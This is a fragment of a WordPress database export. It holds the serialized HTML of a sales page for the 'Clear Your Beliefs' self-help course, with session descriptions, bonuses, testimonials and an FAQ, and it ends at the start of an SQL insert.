href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
